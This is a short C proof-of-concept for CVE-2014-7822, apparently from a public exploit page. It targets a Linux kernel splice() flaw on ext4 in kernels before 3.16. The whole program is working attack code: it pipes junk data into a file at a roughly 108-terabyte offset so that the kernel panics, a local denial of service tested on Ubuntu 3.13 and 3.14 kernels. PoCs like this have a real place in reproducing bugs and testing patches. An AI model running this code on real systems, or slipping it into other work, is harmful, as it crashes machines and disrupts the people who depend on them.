Linux Kernel splice() System Call

/* ----------------------------------------------------------------------------------------------------

* cve-2014-7822_poc.c

*

* The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file

* which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call,

* as demonstrated by use of a file descriptor associated with an ext4 filesystem.

*

* This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.

* Works on ext4 filesystem

* Tested on Ubuntu with 3.13 and 3.14 kernels

*

* Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c

*

* Emeric Nasi - www.sevagas.com

*-----------------------------------------------------------------------------------------------------*/

/* ----------------------- Includes ----------------------------*/

#define _GNU_SOURCE

#include <fcntl.h>

#include <stdio.h>

#include <unistd.h>

#include <errno.h>

#include <string.h>

#include <stdlib.h>

#include <limits.h>

#define EXPLOIT_NAME "cve-2014-7822"

#define EXPLOIT_TYPE DOS

#define JUNK_SIZE 30000

/* ----------------------- functions ----------------------------*/

/* Useful:

*

+============+===============================+===============================+

| \ File flag|                               |                               |

| \ | !EXT4_EXTENTS_FL | EXT4_EXTETNS_FL |

|Fs Features\|                               |                               |

+------------+-------------------------------+-------------------------------+

| !extent | write: 2194719883264 | write: -------------- |

| | seek: 2199023251456 | seek: -------------- |

+------------+-------------------------------+-------------------------------+

| extent | write: 4402345721856 | write: 17592186044415 |

| | seek: 17592186044415 | seek: 17592186044415 |

+------------+-------------------------------+-------------------------------+

*/

/**

* Poc for cve_2014_7822 vulnerability

*/

int main()

{

int pipefd[2];

int result;

int in_file;

int out_file;

int zulHandler;

loff_t viciousOffset = 0;

char junk[JUNK_SIZE] ={0};

result = pipe(pipefd);

// Create and clear zug.txt and zul.txt files

system("cat /dev/null > zul.txt");

system("cat /dev/null > zug.txt");

// Fill zul.txt with A

zulHandler = open("zul.txt", O_RDWR);

memset(junk,'A',JUNK_SIZE);

write(zulHandler, junk, JUNK_SIZE);

close(zulHandler);

//put content of zul.txt in pipe

viciousOffset = 0;

in_file = open("zul.txt", O_RDONLY);

result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);

close(in_file);

// Put content of pipe in zug.txt

out_file = open("zug.txt", O_RDWR);

viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!!

printf("[cve_2014_7822]: ViciousOffset = %lu\n", (unsigned long)viciousOffset);

result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615

if (result == -1)

{

printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno));

exit(1);

}

close(out_file);

close(pipefd[0]);

close(pipefd[1]);

//Open zug.txt

in_file = open("zug.txt", O_RDONLY);

close(in_file);

printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n");

return 0;

}